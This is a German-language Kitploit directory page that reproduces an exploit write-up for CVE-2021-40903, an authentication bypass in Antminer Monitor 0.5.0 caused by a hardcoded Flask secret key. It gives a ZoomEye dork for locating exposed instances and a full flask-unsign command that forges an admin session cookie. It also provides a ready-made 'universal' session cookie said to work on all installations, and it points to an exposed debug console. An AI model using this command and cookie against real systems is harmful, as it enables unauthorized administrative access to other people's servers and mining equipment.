Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-40903 — CVE-2021-40903 | Kitploit
Tools/GitHubGitHub/vulnz/cve-2021-40903
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubvulnz/cve-2021-40903

CVE-2021-40903

CVE-2021-40903

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit-Titel: Antminer Monitor 0.5.0 - Authentication Bypass

CVE: CVE-2021-40903

Datum: 09/06/2021

Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 Exploit-Autor: CQR.company / Vulnz.

Hersteller-Webseite: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor

Software-Link: https://github.com/anselal/antminer-monitor, https://soulis.tech/

Version: 0.5.0

Getestet auf: Windows, Linux, Macos

Die Software wird häufig zur Überwachung von Antminern verwendet und kann leicht in Zoomeye (800) und Shodan (500) gefunden werden. Derzeit ist dies das beliebteste Antminer-Überwachungstool. Die Schwachstelle in Antminer Monitor existiert aufgrund einer Hintertür oder Fehlkonfiguration, die vom Entwickler in der Einstellungsdatei im Flask-Server vorgenommen wurde.

Die Einstellungsdatei hat einen vordefinierten geheimen String, der zufällig generiert werden sollte, jedoch in diesem Build statisch ist. antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

Der geheime Schlüssel ist 'super secret key'.

Basierend auf diesen Informationen können wir Autorisierungs-Bypass-Cookies erstellen.

Mit der Software flask-unsing können wir ein Cookie generieren, das Ihnen Admin-Zugriff gewährt.

flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key"

Zusätzlich können Sie dieses universelle Cookie verwenden, um auf die Weboberfläche der Flask-Anwendung zuzugreifen.

Dieses Cookie kann auf allen Systemen im Feld "session" funktionieren.

.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

Zusätzlich ist DEBUG = True, was bedeutet, dass /console funktioniert, aber es benötigt eine PIN.

Tool herunterladen